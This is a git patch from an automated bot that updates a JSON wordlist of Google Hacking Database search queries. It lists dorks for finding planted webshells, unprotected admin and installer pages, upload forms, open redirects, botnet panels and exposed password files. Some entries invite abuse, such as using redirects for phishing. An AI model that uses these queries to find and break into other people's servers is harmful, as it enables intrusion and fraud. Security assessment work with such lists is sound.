From 80730ca6fc6909bfeaee946c31bba112d15022b7 Mon Sep 17 00:00:00 2001 From: ghdb <> Date: Sun, 28 Jul 2024 01:47:06 +0000 Subject: [PATCH] Bot ghdb auto update --- wordlists/ghdb.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/wordlists/ghdb.json b/wordlists/ghdb.json index 7e8752d..d230aed 100644 --- a/wordlists/ghdb.json +++ b/wordlists/ghdb.json @@ -1 +1 @@ -{"Footholds": [{"dork": "intitle:\"ERROR: The requested URL could not be retrieved\" \"While trying to retrieve the URL\" \"The following error was encountered:\"", "description": "squid error messages, most likely from reverse proxy servers."}, {"dork": "intitle:MyShell 1.1.0 build 20010923", "description": "Basicly MyShell is a php program that allows you to execute commands remotely on whichever server it's hosted on."}, {"dork": "inurl:polly/CP", "description": "You can get into admin panel without logging."}, {"dork": "\"Please re-enter your password It must match exactly\"", "description": "Invision Powerboard registration pages. Plain and simple."}, {"dork": "\"index of /\" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )", "description": "searches for scripts that let you upload files which you can then execute on the server."}, {"dork": "(intitle:\"WordPress \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u201a\u00c2\u00ba Setup Configuration File\")|(inurl:\"setup-config.php?step=\")", "description": "Alter setup configuration files.add ?step=1"}, {"dork": "inurl:\"amfphp/browser/servicebrowser.swf\"", "description": "AMFPHP service browser, debug interface. Author: syddd"}, {"dork": "intitle:\"uploader by ghost-dz\" ext:php", "description": "intitle:\"uploader by ghost-dz\" ext:php"}, {"dork": "intitle:\"WSO 2.4\" [ Sec. Info ], [ Files ], [ Console ], [ Sql ], [ Php ], [ Safe mode ], [ String tools ], [ Bruteforce ], [ Network ], [ Self remove ]", "description": "dork to find uploaded WSO 2.4 shell by hackers.\nfound by Anon?M ID"}, {"dork": "ext:asp intext:Smart.Shell 1.0 BY P0Uy@_$3r\\/3R -", "description": "A new WebShell interesting. Have Fun.\nBy Rootkit."}, {"dork": "intitle:SN0X SHELL: WEEEEEEEEEEEEEEEEED", "description": "Google Dork that brings up ddos shell"}, {"dork": "intext:\"Thehacker - Agd_Scorp - BLaSTER - Cr@zy_King - KinSize - JeXToXiC - s3f4 - rx5\"", "description": "BLaSTER Webshell Footholds.\nDecoy"}, {"dork": "intext:\"Please select file to upload:\" ext:php", "description": "Various file upload forms - potential footholds?\nDecoy"}, {"dork": "crime24 stealer ext:txt", "description": "crime24 stealer ext:txt\natawho-sonadam-hackunity"}, {"dork": "intitle:\"WSO \" ext:php intext:\"server ip\" 2015 intext:\" [ home ]\"", "description": "intitle:\"WSO \" ext:php intext:\"server ip\" 2015 intext:\" [ home ]\"\natawho-sonadam-hackunity"}, {"dork": "(intitle:\"phpshell\" OR intitle:\"c99shell\" OR intitle:\"r57shell\" OR intitle:\"PHP Shell \" OR intitle:\"phpRemoteView\") `rwx` \"uname\"", "description": "(intitle:\"phpshell\" OR intitle:\"c99shell\" OR intitle:\"r57shell\" OR intitle:\"PHP Shell \" OR intitle:\"phpRemoteView\") `rwx` \"uname\""}, {"dork": "intitle: \"phpshell\" \"Php Safe-Mode Bypass\"", "description": "intitle: \"phpshell\" \"Php Safe-Mode Bypass\""}, {"dork": "intitle:\"nstview v2.1:: nst.void.ru\" | intext:\"nsTView v2.1 :: nst.void.ru. Password: Host:\"", "description": "Anothe webshell \"nstview v2.1.php\"\n-Xploit"}, {"dork": "( ext:php ) ( inurl:/wp-content/uploads/AAPL/loaders/ )", "description": "Finds a few handy little web shells ;)\nDxtroyer"}, {"dork": "intitle:\"Priv8 Mailer Inbox 2015\" ext:php", "description": "Just another mailer :P\nPlease DO NOT use for spam!\nDxtroyer"}, {"dork": "\"El Moujahidin Bypass Shell\" ext:php", "description": "Simple upload/dir shell\n- Dxtroyer"}, {"dork": "\"WHMCS Auto Xploiter\"", "description": "Finds WHMCS exploit shellz in sites\nDxtroyer"}, {"dork": "intitle:\"Authorization\" \"TF\" inurl:\"admin.php\"", "description": "Finds a bunch of unprotected botnet control panels\nDxtroyer"}, {"dork": "\"Sorting Logs:\" \"Please enter your password\" \"Powered By\" -urlscan -alamy", "description": "Finds stealer botnet control panels (If you can guess the login, you'll\nhave access to the WHOLE botnet!)\nDxtroyer"}, {"dork": "intitle:admin intitle:login", "description": "Admin Login pages. Now, the existance of this page does not necessarily mean a server is vulnerable, but it sure is handy to let Google do the discovering for you, no? Let's face it, if you're trying to hack into a web server, this is one of the more obvious places to poke."}, {"dork": "+htpasswd +WS_FTP.LOG filetype:log", "description": "WS_FTP.LOG can be used in many ways to find more information about a server. This query is very flexible, just substitute \"+htpasswd\" for \"+FILENAME\" and you may get several hits that you hadn't seen with the 'normal' search. Filenames suggested by the forum to explore are: phpinfo, admin, MySQL, password, htdocs, root, Cisco, Oracle, IIS, resume, inc, sql, users, mdb, frontpage, CMS, backend, https, editor, intranet . The list goes on and on..A different approach might be \"allinurl: \"some.host.com\" WS_FTP.LOG filetype:log\" which tells you more about who's uploading files to a specific site."}, {"dork": "\"Powered by PHPFM\" filetype:php -username", "description": "PHPFM is an open source file manager written in PHP. It is easy to set up for a beginner, but still easy to customize for the more experienced user. The built-in login system makes sure that only people with the right username and password gains access to PHPFM, however, you can also choose to disable the login system and use PHPFM for public access. It can currently: create, rename and delete folders; create, upload, rename, download and delete files; edit text files; view image files; sort files by name, size, permissions and last modification date both ascending and descending; communicate in more languages. This search finds those \"public\" versions of PHPFM. An attacker can use them to manage his own files (phpshell anyone ?).PS: thanks to j0hnny for the public access angle :)"}, {"dork": "intitle:\"PHP Shell *\" \"Enable stderr\" filetype:php", "description": "PHP Shell is a shell wrapped in a PHP script. It's a tool you can use to execute arbiritary shell-commands or browse the filesystem on your remote Web server. This replaces, to a degree, a normal telnet-connection. You can use it for administration and maintenance of your Web site using commands like ps, free, du, df, and more.If these shells aren't protected by some form of authentication, an attacker will basicly *own* the server. This search finds such unprotected phpshells by looking for the keyword \"enable stderr\"."}, {"dork": "\"adding new user\" inurl:addnewuser -\"there are no domains\"", "description": "Allows an attacker to create an account on a server running Argosoft mail server pro for windows with unlimited disk quota (but a 5mb per message limit should you use your account to send mail)."}, {"dork": "intitle:\"Web Data Administrator - Login\"", "description": "The Web Data Administrator is a utility program implemented in ASP.NET that enables you to easily manage your SQL Server data wherever you are. Using its built-in features, you can do the following from Internet Explorer or your favorite Web browser. Create and edit databases in Microsoft SQL Server 2000 or Microsoft SQL Server 2000 Desktop Engine (MSDE) Perform ad-hoc queries against databases and save them to your file system Export and import database schema and data."}, {"dork": "(inurl:81/cgi-bin/.cobalt/) | (intext:\"Welcome to the Cobalt RaQ\")", "description": "The famous Sun linux appliance. The default page displays this text:\"Congratulations on Choosing a Cobalt RaQ - the premier server appliance platform for web hosting. This page can easily be replaced with your own page. To replace this page, transfer your new content to the directory /home/sites/home/web\"."}, {"dork": "inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx", "description": "Windows Small Business Server 2003: The network configuration page is called \"ConnectComputer/precheck.htm \" and the Remote Web login page is called \"remote/logon.aspx\"."}, {"dork": "filetype:php HAXPLORER \"Server Files Browser\"", "description": "Haxplorer is a webbased filemanager which enables the user to browse files on the webserver. You can rename, delete, copy, download and upload files. As the script's name says it is mostly installed by hackers"}, {"dork": "PHPKonsole PHPShell filetype:php -echo", "description": "PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver. When you run commands they will run as the webservers UserID. This should work perfectly for managing files, like moving, copying etc. If you're using a linux server, system commands such as ls, mv and cp will be available for you..."}, {"dork": "inurl:\"phpOracleAdmin/php\" -download -cvs", "description": "phpOracleAdmin is intended to be a webbased Oracle Object Manager.In many points alike phpMyAdmin, it should offer more comfort and possibilities. Interestingly these managers are not password protected."}, {"dork": "intitle:\"YALA: Yet Another LDAP Administrator\"", "description": "YALA is a web-based LDAP administration GUI. The idea is to simplify the directory administration with a graphical interface and neat features, though to stay a general-purpose programThe goal is to simplify the administration but not to make the YALA user stupid: to achieve this, we try to show the user what YALA does behind the scenes, what it sends to the server"}, {"dork": "intitle:\"net2ftp\" \"powered by net2ftp\" inurl:ftp OR intext:login OR inurl:login", "description": "net2ftp is a web-based FTP client written in PHP. Lets explain this in detail. Web-based means that net2ftp runs on a web server, and that you use a browser (for example Internet Explorer or Mozilla)"}, {"dork": "inurl:\"tmtrack.dll?\"", "description": "This query shows installations of Serena Teamtrack. (www.serena.com).You may be able to adjust the application entry point, by providing a command after the \"tmtrack.dll?\" like thistmtrack.dll?LoginPagetmtrack.dll?View&Template=viewand more."}, {"dork": "(intitle:\"SHOUTcast Administrator\")|(intext:\"U SHOUTcast D.N.A.S. Status\")", "description": "sHOUTcast is a free-of-charge audio homesteading solution. It permits anyone on the internet to broadcast audio from their PC to listeners across the Internet or any other IP-based network (Office LANs, college campuses, etc.).SHOUTcast's underlying technology for audio delivery is MPEG Layer 3, also known as MP3 technology. The SHOUTcast system can deliver audio in a live situation, or can deliver audio on-demand for archived broadcasts."}, {"dork": "allintext:\"fs-admin.php\"", "description": "A foothold using allintext:\"fs-admin.php\" shows the world readable \ndirectories of a plug-in that enables Wordpress to be used as a forum. Many \nof the results of the search also show error logs which give an attacker the \nserver side paths including the home directory name. This name is often also \nused for the login to ftp and shell access, which exposes the system to \nattack. There is also an undisclosed flaw in version 1.3 of the software, as \nthe author has mentioned in version 1.4 as a security fix, but does not tell \nus what it is that was patched.\n \nAuthor: DigiP"}, {"dork": "Re: intitle:Priv8 SCR", "description": "I am Un0wn_X\nSymlink User configs\nintitle:Priv8 SCR"}, {"dork": "intitle:C0ded By web.sniper", "description": "User & Domain || Symlink\nUsing this dork you can find the User and the Domains of the Server...\nintitle:C0ded By web.sniper\nAuthor: Un0wn_X"}, {"dork": "Re: inurl:\"r00t.php\"", "description": "This dork finds websites that were hacked, backdoored and contains their \nsystem information e.g: Linux web.air51.ru 2.6.32-41-server #89-Ubuntu\nSMP Fri Apr 27 22:33:31 UTC 2012 x86_64.\nJay Turla a.k.a shipcode"}, {"dork": "inurl:1337w0rm.php intitle:1337w0rm", "description": "Finds websites that have 1337w0rm's CPanel cracker uploaded.\nSince the Cracker is relatively new, some sites might not use it. \n-TehMysticaL"}, {"dork": "filetype:php intext:\"!C99Shell v. 1.0 beta\"", "description": "php backdoor: c99 shell\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "intitle:\"=[ 1n73ct10n privat shell ]=\"", "description": "the dork is used to find uploaded 1n73ct10n Shell on website.\nfound by Anon?M ID"}, {"dork": "inurl:sh3llZ/c99/", "description": "Through this shell you can find c99 shells uploaded on websites. inurl:sh3llZ/c99/"}, {"dork": "ext:php intitle:\"b374k\"", "description": "ext:php intitle:\"b374k\"\ndetails; http://atawho.blogspot.com.tr/2015/12/b374k-shell-tespiti.html\natawho-sonadam-hackunity"}, {"dork": "ext:aspx intitle:aspxspy", "description": "Asp shells\next:aspx intitle:aspxspy\ndetails:\nhttp://atawho.blogspot.com.tr/2015/11/aspx-shell-dorku-ghbd.html\nsonadam-atawho-hackunity"}, {"dork": "intext:\"Sw Bilgi\" ext:php", "description": "Upload Shell Dork\nintext:\"Sw Bilgi\" ext:php\n details:\nhttp://atawho.blogspot.com.tr/2015/11/shell-dork-031115.html\natawho-sonadam-hackunity"}, {"dork": "intext:Developed By Black.Hack3r ext:php", "description": "Upload Shell Dorks\nintext:Developed By Black.Hack3r ext:php\nintitle:.:: Private Uploder By Black.Hack3r ::. ext:php\ndetail:"}, {"dork": "intitle:\"Shell I\" inurl:revslider inurl:error.php inurl:cmd", "description": "Find shells inserted using the revslider vulnerability.\n--\nStephen Haywood\nOwner: ASG Consulting\naveragesecurityguy.info"}, {"dork": "inurl:revslider inurl:temp inurl:update_extract inurl:sym1", "description": "Symlinks to files using the revslider vulnerability.\n--\nStephen Haywood\nOwner: ASG Consulting\naveragesecurityguy.info"}, {"dork": "intitle:Automatic cPanel Finder/Cracker | 3xp1r3 Cyber Army", "description": "Google dork Description : intitle:\"Automatic cPanel Finder/Cracker | 3xp1r3 Cyber Army\"\nAuthor: youssef hesham\nan exploit to find uploaded cPanel Finder/Cracker script and find cracked cpanle on it"}, {"dork": "\"Fenix Final Version v2.0\" filetype:php", "description": "Web-Shell new, very interesting.\nHave Fun.\nRegards.\nRootkit Pentester."}, {"dork": "intitle:\"Hamdida X_Shell Backd00r\"", "description": "Interesting little backdoor.\nintitle:\"Hamdida X_Shell Backd00r\"\nDecoy"}, {"dork": "filetype:php intext:Your Email: intext:Your Name: intext:Reply-To: intext:mailer", "description": "This dork results in PHP mailers already uploaded and ready for use ! ;)\nGoogle Dork :\nfiletype:php intext:\"Your Email:\" intext:\"Your Name:\" intext:\"Reply-To:\" intext:mailer\n \nBest Regards.\nXSLASH"}, {"dork": "\"You have selected the following files for upload (0 Files).\"", "description": "Find file upload pages. \nThe dork is: \"You have selected the following files for upload (0 Files).\"\nGabe Mills\nHacker"}, {"dork": "inurl:\"html/js/editor/ckeditor/\"", "description": "name =find liferay upload file\nGoogle dork Description: inurl:\"html/js/editor/ckeditor/\"\nGoogle search: inurl:\"html/js/editor/ckeditor/\"\nDate: 2016-09-30\nAuthor: sultan albalawi\nFind file upload pages.\nSummary: liferay upload file."}, {"dork": "\"File Manager Version 1.0\" \"Coded By\"", "description": "File Managers webshells. Enjoy with healthy.\nDork by Rootkit Pentester."}, {"dork": "\"PHP eMailer is created by\" ext:php", "description": "Dork: \"PHP eMailer is created by\" ext:php\nPHP SMTP MAILER\nNo comment, don't waste your time for negative thinking. \nNO SPAM PLEASE ..\nDork by INILERM"}, {"dork": "\"PHP Mailer\" \"priv8 Mailer\" ext:php", "description": "Dork: \"PHP Mailer\" \"priv8 Mailer\" ext:php\nPHP (SMTP) MAILER\nNo comment, don't waste your time for negative thinking. \nNO SPAM PLEASE ..\nDork by INILERM"}, {"dork": "Meg4-Mail ext:php", "description": "Google Dork: Meg4-Mail ext:php\nPHP MAILER\nNO SPAM PLEASE ..\nGoolge Dork by INILERM"}, {"dork": "inurl:/\\\\filesrc=**** ~\"Current\" ~\":/\" ~\"upload\"", "description": "Extensive list of shell backdoors implimented on websites.\ninurl:/\\\\filesrc=**** ~\"Current\" ~\":/\" ~\"upload\" -codex -smashingmagazine\n-'pub' -'public' -'mp3' -fossies -websvn -svn -git -login -.de -.fl -.ru\n-.jp -.kr -.ch -.dk -dorks -google -Google -.gov -prevent -help -how -reset\n-your -developer -reference -support -github\nAnything with \"-\" in the beginning is used to help combat the fact that\ngoogle does not really want us to see all of the results. If we do not\nfilter through, google will mark us as a bot user and block our ip address.\nThe \"do not search\" expression is as important as the term or phrase we\nwish to search and match for.\nThanks,\nMrM"}, {"dork": "inurl:?filesrc=**** ~\"Current\" ~\"asp\"", "description": "Also here are more different uploaded shell names.\ninurl:\"?filesrc=//\" \"Upload\" ~admin\n \n-Xploit"}, {"dork": "inurl:\"go.cgi?url=\"", "description": "Finds pages which can be exploited to redirect to any site (You could use\nthis for phishing, etc.)\nDxtroyer"}, {"dork": "intitle:index of intext:wncry", "description": "Dork to find servers affected by Wannacry Ransomware.\nAuthor https://twitter.com/SadFud75"}, {"dork": "intitle:index of intext:@WanaDecryptor@.exe", "description": "More of the Wannacry Ransonware infected Servers.\nintitle:index of intext:@Please_Read_Me@.txt\n-Xploit"}, {"dork": "ext:php intext:\"-rwxr-xr-x\" site:.in", "description": "You can find the software affected at:\n ext:php intext:\"-rwxr-xr-x\" site:.in\nArmhacker666"}, {"dork": "ext:jsp intext:\"jspspy\" intitle:\"Jspspy web~shell V1.0\"", "description": "Find login portals of jspspy webshell.\r\nHuijun Chen"}, {"dork": "intitle:\"Solr Admin\" \"Solr Query Syntax\"", "description": "Finds Apache Solr admin panels\r\n\r\nDxtroyer"}, {"dork": "inurl:/install/stringnames.txt", "description": "inurl:/install/stringnames.txt\r\n\r\n this DORK is useful to search moodle cms with install folder left on the hosted server"}, {"dork": "intitle:\"Installing TYPO3 CMS\"", "description": "This will find the First Install Wizard of the TYPO3 CMS.\r\n\r\nThis is NOT the same as this dork: https://www.exploit-db.com/ghdb/3942/\r\nwhich lets you find the Install tool, which is available after the\r\nInstallation itself.\r\n\r\nMy dork will rather find the First Install wizard, which opposed to the\r\nInstall tool does not have a password protection.\r\n\r\nSome Installations should be able to be hijacked this way.\r\n\r\nUse ethically and responsibly.\r\nDork by _palonE"}, {"dork": "intitle:Upload inurl:/cgi-bin/filechucker.cgi", "description": "AJAX-based web application / file manager - \u201cfilechucker\u201d that lets you upload arbitary files on a website.\r\n\r\n\r\nAuthor: Parth S. Patel\r\nhttps://ca.linkedin.com/in/parthpateloscp"}, {"dork": "inurl:\"/tiny_mce/plugins/ajaxfilemanager/inc/data.php\" | inurl:\"/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php\" -github", "description": "finds tiny_mce vulnerable targets\r\n\r\n\r\n-- \r\n*Regards*\r\n*Ebaduddin Ahmad*"}, {"dork": "inurl: \"Mister Spy\" | intext:\"Mister Spy & Souheyl Bypass Shell\"", "description": "inurl: \"Mister Spy\" | intext:\"Mister Spy & Souheyl Bypass Shell\"\r\n\r\nThis Google Dork discovers servers infected with the \"Mister Spy\" web \r\nshell.\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "\"File Manager - Current disk free\"", "description": "# Google Dork: \"File Manager - Current disk free\"\r\n# Date: 18/8/2018\r\n# Exploit Author: srikwit\r\n\r\nGoogle Dork to locate PhpSpy web shells"}, {"dork": "\"index of\" /wp-content/uploads/shell.php", "description": "\"index of\" /wp-content/uploads/shell.php\r\n\r\nThis Google Dork discovers servers running Wordpress that are infected \r\nwith web shells.\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "intext:\"M3R1C4 SHELL BACKDOOR\"", "description": "intext:\"M3R1C4 SHELL BACKDOOR\"\r\n\r\nfoothold web shell\r\n\r\nManhNho"}, {"dork": "intitle:\"FCKeditor - Uploaders Tests\"", "description": "Dork: intitle:\"FCKeditor - Uploaders Tests\"\r\n\r\n\r\nUnauthenticated file upload\r\n\r\n\r\n\r\nBurov Konstantin"}, {"dork": "intitle:\"FCKeditor - Connectors Tests\"", "description": "Dork: intitle:\"FCKeditor - Connectors Tests\"\r\n\r\n\r\nUnauthenticated file upload and directory list\r\n\r\n\r\nBurov Konstantin"}, {"dork": "intitle:\"InfluxDB - Admin Interface\" -github", "description": "Dork about InfluxDB without password\r\nInfluxDB - Open Source Time Series DB Platform for Metrics & Events (Time Series Data)\r\n\r\n\r\nintitle:\"InfluxDB - Admin Interface\" -github\r\n\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "inurl:\"/sidekiq/busy\"", "description": "*Google dork description: Get the sidekiq dashboard that is used to run\r\nRuby systems. You have the access to view, start, stop processes*\r\n\r\n*Google Search:* inurl:\"/sidekiq/busy\"\r\n\r\n*Submitted by:* Alfie\r\n\r\nWebsite: (https://the-infosec.com)"}, {"dork": "inurl:/phpMyAdmin/setup/index.php?phpMyAdmin=", "description": "Exploit : Access the Sensitive page of phpmyadmin\r\n\r\nGoogle Dork : inurl:/phpMyAdmin/setup/index.php?phpMyAdmin=\r\n\r\nExploit Author:- Ehsan Nikavar"}, {"dork": "inurl:wp-login.php?action=register", "description": "Wordpress sites with registration enabled."}, {"dork": "inurl:\"urlstatusgo.html?url=\" -intext:\"Disallowed by URL filter\"", "description": "Open Redirects.\r\n\r\nD"}, {"dork": "inurl:\"cs.html?url=\"", "description": "Open Redirects.\r\n\r\nD"}, {"dork": "inurl:/phpmyadmin/index.php?db=", "description": "inurl:/phpmyadmin/index.php?db=\r\n\r\nphpmyadmin authenticated panel\r\n\r\nManhNho"}, {"dork": "intitle:Administration - Installation - MantisBT", "description": "Dorks for mantisBT CMS installation\r\n\r\nMr.XSecr3t"}, {"dork": "inurl:\"index.php?db=\"", "description": "Google Dork: \"index.php?db=\"\r\nDate: 09/14/2019\r\nExploit Author: th3d3xt3r\r\nCategory: Footholds"}, {"dork": "site:*/wp-admin/install.php intitle:WordPress Installation", "description": "Files Containing Juicy Info:\r\n\r\nsite:*/wp-admin/install.php intitle:WordPress Installation\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"freedom is real - 1945\"", "description": "Dork:\r\nintitle:\"freedom is real - 1945\"\r\nCategory: Vulnerable servers\r\nAuthor: Jakob Denlinger\r\n\r\nInfo:\r\nCommon webshell that sets the HTML title tag to '.[ freedom is real - 1945\r\n].'"}, {"dork": "inurl:\"index of\" wso", "description": "Dork:inurl:\"index of\" wso\r\nAuthor:Santhosh Kumar Kuppan\r\nInformation: Access to WSO shell infected domains."}, {"dork": "site:bamboo.*.* ext:action build", "description": "find misconfigured and open bamboo instances\r\n\r\nex16x41"}, {"dork": "intitle:\"(SSI Web Shell)\" AND intext:\"(ls -al)\"", "description": "# Dork #\r\n\r\nintitle:\"(SSI Web Shell)\" AND intext:\"(ls -al)\"\r\n\r\nFootholds for SSI Web Shell."}, {"dork": "intitle:(\"Mini Shell\") AND intext:(\"Upload File\")", "description": "# Dork #\r\n\r\nintitle:(\"Mini Shell\") AND intext:(\"Upload File\")\r\n\r\n\r\nFootholds for Mini Web Shell."}, {"dork": "intitle:(\"Index of\") AND intext:(\"c99.txt\" OR \"c100.txt\")", "description": "# Dork #\r\n\r\nintitle:(\"Index of\") AND intext:(\"c99.txt\" OR \"c100.txt\")\r\n\r\nFootholds for possible infected domain with web shell contents."}, {"dork": "site:linkedin.com employees target.com", "description": "*Dork: *site:linkedin.com employees target.com\r\n\r\n*Description:* This google dork will list all the employees of a particular\r\norganisation who are there on linkedin.\r\n\r\n*Author:* Shamika Shewale"}, {"dork": "inurl:\"customer.aspx\"", "description": "# Google Dork: inurl:\"customer.aspx\"\r\n# Title: Containing feedback Portal\r\n# Date: 2020-06-07\r\n# Author: Mahesh Rai\r\n#LinkedIn: https://www.linkedin.com/in/mahesh-rai\r\n#Bugcrowd: https://bugcrowd.com/Mahesh_Rai"}, {"dork": "inurl:/servicedesk/customer/user/login", "description": "Google Dork: inurl:/servicedesk/customer/user/login\r\n\r\nPages containing Login Portals\r\n\r\nAuthor: Rutwik Shah"}, {"dork": "Find Microsoft Lync Server AutoDiscover", "description": "Dork: allinurl:XFrame.html\r\n\r\nFind Microsoft Lync Server AutoDiscover\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "inurl:/download_file/ intext:\"index of /\"", "description": "inurl:/download_file/ intext:\"index of /\"\r\n\r\n----\r\nRegards,\r\nRishabh Chaplot"}, {"dork": "intitle:\"index of\" \"admin/xml\"", "description": "Google Dork: intitle:\"index of\" \"admin/xml\"\r\nExploit Author: Viraj Mota\r\nDescription: This Google dork lists out sensitive XML file stored in the\r\nadmin folder for a website.\r\n\r\nBest regards,\r\nViraj Mota"}, {"dork": "inurl:logon/LogonPoint/index.html", "description": "Dork: inurl:logon/LogonPoint/index.html\r\nDescription: Find Citrix Gateway Portals that might be potentially\r\nvulnerable to CVE-2019-19781.\r\nAuthor - Harsh Bothra\r\nTwitter - https://www.twitter.com/harshbothra_"}, {"dork": "inurl:\"/arcgis/rest/services\"", "description": "# Find Esri ArcGIS servers.\r\n# Author: Tolga Kaya\u015f\r\n# Date: 18/06/2020\r\n# Linkedin: https://www.linkedin.com/in/tolga-k/"}, {"dork": "inurl:\"/jmx-console/HtmlAdaptor?action\"", "description": "Dork: inurl:\"/jmx-console/HtmlAdaptor?action\"\r\nDescription: Sensitive data Exposure\r\n---\r\nAuthor: Krushna Lipane"}, {"dork": "intitle:\"index of\" and intext:\"vendor\" and intext:\"phpunit\"", "description": "# Dork: intitle:\"index of\" and intext:\"vendor\" and intext:\"phpunit\"\r\n# Author: Arpit Kubadia\r\n# This dork searches both for directory listings,\r\n# as well as a well-known PHP file called PHPUnit that is often vulnerable to\r\n# remote code execution.\r\n# Attaching below the same dork in attachment\r\n\r\n# Regards."}, {"dork": "\"radius-server key\" ext:cfg OR ext:log OR ext:txt", "description": "# Google Dork: \"radius-server key\" ext:cfg OR ext:log OR ext:txt\r\n# By using this dork some radius-server keys can be found.\r\n# Date: 1/07/2020\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"nginx.log\"", "description": "Description : intitle:\"index of\" \"nginx.log\"\r\n\r\nThis google dork gives us the Nginx logs and sensitive details of\r\nmisconfigured servers.\r\n\r\n\r\n\r\n\r\n\r\n\r\nRegards,\r\nEmmanuel Karunya\r\n+919743055278"}, {"dork": "intitle:\"Index of /\" +.htaccess", "description": "Dork:intitle:\"Index of /\" +.htaccess\r\nDescription: Access to the parent directory and more...\r\nAuthor: Priyanka Prasad"}, {"dork": "intitle:\"index of /\" +.htdocs", "description": "Description: intitle:\"index of /\" +.htdocs\r\nAccess to the parent directory and get lots of information of directory\r\nand contains with sensitive information.This kind of foothold.\r\n\r\nLinkedin : https://www.linkedin.com/in/peaceonmind/\r\n\r\nThanks,\r\nTanmay Bhattacharjee"}, {"dork": "intitle:\"index.of\" +jmx-console", "description": "Description: intitle:\"index.of\" +jmx-console\r\n\r\nThis google dorks give us java management extention.\r\n\r\n\r\nThanks,\r\nTanmay Bhattacharjee"}, {"dork": "inurl:CTCWebService", "description": "# Google Dork: inurl:CTCWebService\r\n# Date: 8/24/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: www.hack.com.ar\r\n\r\nJavier Bernardo\r\n*Information Security Analyst \u2013 Ethical Hacker*\r\nAires - Argentina"}, {"dork": "inurl::/app/kibana \"Kibana\" -discuss -ipaddress -git", "description": "# Google Dork: inurl::/app/kibana \"Kibana\" -discuss -ipaddress -git\r\n# Kibana Visualization Dashboards\r\n# Date: 31/08/2020\r\n# Exploit Author: Adithya Chandra\r\n\r\n\r\nThanks and Best Regards,\r\nAdithya Chandra"}, {"dork": "inurl:/Dashboard.xhtml intitle:\"Dashboard\"", "description": "# Google Dork: inurl:/Dashboard.xhtml intitle:\"Dashboard\"\r\n# Various exposed dashboards.\r\n# Date: 1/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"/plugins/servlet/Wallboard/\"", "description": "Google Dork : inurl:\"/plugins/servlet/Wallboard/\"\r\n\r\nThis will give all the Jira dashboard which might be vulnerable to XSS.\r\n(Sensitive Data Exposure)\r\n\r\nAuthor : Pratik Khalane\r\n\r\nDate : 10/09/2020"}, {"dork": "mail/u/0 filetype:pdf", "description": "Google Dork: mail/u/0 filetype:pdf\r\nDescription: Pages Exposing internal Documents\r\nDate: 11/09/2020\r\n\r\nThanks & Regards\r\nAjithKumar K"}, {"dork": "intitle:\"index of\" \"httpd.pid\"", "description": "Dork: intitle:\"index of\" \"httpd.pid\"\r\n\r\n\r\n*Regards,*\r\n*Navaneeth Shyam*\r\n*Security Researcher*"}, {"dork": "inurl:wsnavigator/jsps", "description": "# Google Dork: inurl:wsnavigator/jsps\r\n\r\n# Date: 9/11/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage:\r\n[www.hack.com.ar](http://www.hack.com.ar/)\r\n\r\nJavier Bernardo\r\nInformation Security Analyst \u2013 Ethical Hacker\r\nMobile: +54 9 11 6219 0141 |[Email:javierbernardo001@gmail.com](mailto:Email%3Ajavierbernardo001@gmail.com) | Buenos Aires - Argentina\r\n\r\nSent with [ProtonMail](https://protonmail.com) Secure Email."}, {"dork": "inurl:maps.arcgis.com +\"City of\"", "description": "# Google Dork: inurl:maps.arcgis.com +\"City of\"\r\n# Footholds\r\n# Date: 22/09/21\r\n# Exploit Author: Edmond Major"}, {"dork": "inurl:adminpanel site:gov.*", "description": "# Description : inurl:adminpanel site:gov.*\r\n# This google dork indexes pages containing Admin Login Panels of government\r\n# sites where an attacker can login and bypass restrictions if not configured\r\n# properly.\r\n# Author : Asheet Tirkey\r\n# Date : 11th Jan 2022"}], "Files Containing Usernames": [{"dork": "+intext:\"webalizer\" +intext:\"Total Usernames\" +intext:\"Usage Statistics for\"", "description": "The webalizer program displays various information but this query displays usernames that have logged into the site. Attckers can use this information to mount an attack."}, {"dork": "intext:\"SteamUserPassphrase=\" intext:\"SteamAppUser=\" -\"username\" -\"user\"", "description": "This will search for usernames and passwords for steam (www.steampowered.com) taken from the SteamApp.cfg file."}, {"dork": "inurl:\"/root/etc/passwd\" intext:\"home/*:\"", "description": "inurl:\"/root/etc/passwd\" intext:\"home/*:\""}, {"dork": "intext:\"root:x:0:0:root:/root:/bin/bash\" inurl:*=/etc/passwd", "description": "Author: ./tic0 | Izzudin al-Qassam Cyber Fighter"}, {"dork": "inurl:/_layouts/mobile/view.aspx?List=", "description": "I came across on a string \\ dork that does not exist anywhere and it allows\nyou to see the metadata of all the domain's content & index everything.\nhere is the dork 'inurl:/_layouts/mobile/view.aspx?List='\nIt enables you to access MIcrosoft Sharepoint CMS based domains\nIn the following format\nYou're able to view the source user (modified or created by)\n1. Depending on the target it can be used in a brute-force attack for\nconstructing a password list with the internal user information.\n2. It is a serious information disclosure issue (due to the reason that\nsome Government websites also use MIcrosoft Sharepoint) and it discloses\ntheir employees names.\nEva Prokofiev"}, {"dork": "intitle:index.of .sh_history", "description": "Ok, this file contains what a user typed at a shell command prompt. You shouldn't advertise this file. You shouldn't flash it to a web crawler. It contains COMMANDS and USERNAMES and stuff... *sigh* Sometimes there aren't words to describe how lame people can be. This particular theme can be carried further to find all sorts of things along these lines like .profile, .login, .logout files, etc. I just got bored with all the combinations..."}, {"dork": "intitle:index.of .bash_history", "description": 